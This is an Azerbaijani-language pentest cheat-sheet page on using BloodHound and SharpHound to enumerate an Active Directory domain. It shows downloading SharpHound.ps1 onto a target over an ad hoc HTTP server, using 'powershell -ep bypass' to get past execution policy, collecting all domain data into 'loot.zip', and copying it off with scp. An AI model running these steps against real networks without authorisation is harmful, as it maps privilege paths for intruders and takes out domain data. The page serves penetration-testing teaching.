Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page
  • BloodHound nədir?
  • BloodHound yükləmək
  • Bloodhoud konfiqurasiyası
  • SharpHound.ps1
  • SharpHound.ps1 istifadəsi

Was this helpful?

  1. AD Pentesting
  2. Domain Enumeration

BloodHound ilə enumeration

PreviousAD Module ilə enumerationNextOn Site BloodHound

Last updated 1 year ago

Was this helpful?

BloodHound nədir?

BloodHound informasiya təhlükəsizliyi testi və təhlili üçün bir vasitədir. Xüsusilə Active Directory (AD) mühitində hücum səthlərini müəyyən etmək, giriş hüquqlarını təhlil etmək və təhlükəsizlik zəifliklərini aşkar etmək üçün istifadə olunur. BloodHound kəşf, təhlil və hesabat alətləri platformasıdır.

Bu alət AD mühitində əlaqə və giriş hüquqlarının xəritəsini yaradır, beləliklə, təhlükəsizlik ekspertləri və sistem administratorları potensial zəiflikləri aşkarlaya, imtiyazlı giriş yollarını müəyyən edə və təhlükəsizliklə bağlı riskləri təhlil edə bilərlər.

BloodHound yükləmək

Öz kali linux-a yükləyirik bloodhoundı bunun üçündə aşaqıdakı komudu işlədirik

apt-get install bloodhound

Bloodhoud konfiqurasiyası

Yüklədikdən sonra neo4j console əmrindən istifadə etməliyik və işlədikdən sonra bizə bir link verəcək.

O linkə daxil olduqda bizi giriş hissəsi qarşılayır username və şifrə varsayılan olaraq neo4j:neo4j olur həmişə.Girdikdən sonra öz şifrəmizi təyin edirik.

Növbəti mərhələdə terminala bloodHound əmrini yazıb və acılan pəncərədə təyin etdiyimiz şifrəni yazıb daxil oluruq.

beləliklə bloodhound yüklənməsi və konfiqurasiyası tamamlandı artıq növbəti mərhələyə kecə bilərik.

SharpHound.ps1

SharpHound, Active Directory (AD) mühitində kəşf etmək və BloodHound kimi alətlərlə istifadə etmək üçün hazırlanmış PowerShell skriptidir. BloodHound kimi əlaqə və giriş hüquqları xəritələri yaratmaq üçün nəzərdə tutulmuşdur.

SharpHound AD mühitində hədəflənmiş məlumatları toplayır və bu məlumatları BloodHound-a ötürmək üçün istifadə olunur. O, AD mühitində əlaqəli əlaqələri, istifadəçi hesablarını, qrup üzvlüklərini, giriş icazələrini, imtiyazlı giriş yollarını və oxşar məlumatları toplayır. Bu məlumat daha sonra BloodHound kimi analiz alətlərinə verilir və qrafik olaraq vizuallaşdırılır.

SharpHound.ps1 istifadəsi

SharpHound.ps1 sistemin özündə varsayılan olaraq olmur gərək onun üçün githab öz linuxsumuza yükləyirik.Sonra python serveri qaldırıq. wget ilə AD qoşulduqumuz komuterə yükləyirik.

python -m http.server 8088

wget əmri ilə qaldırdıqımız serverdən sharpHound.ps1 faylını windowsa cəkirik.

wget http://<IP>:8088/SharpHound.ps1

SharpHound.ps1 yüklədikdən sonra aşaqıdakı əmləri yazırıq:

powershell -ep bypass # Execution Policy bypass etmək üçün işlədilir
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName name.zip 
# -Domain: Domain adını təyin edirik
# -ZipFileName: bura isə yükləyəcəyi faylın adını yazırıq

Yüklədikdən sonra cmd acıb ağıdakı əmrləri yazırıq:

powershell -ep bypass 
. .\SharpHound.ps1 
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

Və bizə bir zip fayl verir.

İndi bu zip faylını öz sistemizə köcürməliyik bunun üçün scp istifadə edirik.

scp administrator@<IP>:<ZIP_FAYLININ_YERİ> <ZIP_FAYLINI_YÜKLƏYƏCƏYİ_YER>

BloodHounda daxil oluruq və sağda import graf dütməsinə basıb zip faylını secirik.

Qrafikləşdirilmiş şəbəkəyə baxmaq üçün menyunu açın və sorğuları seçin

Sorğular istəsəz yalnız adminləri göstərər

Və ya yüksək dəyərli hədəflərə aparan ən qısa yolar kimi mürəkkəb şeylərdə göstərər.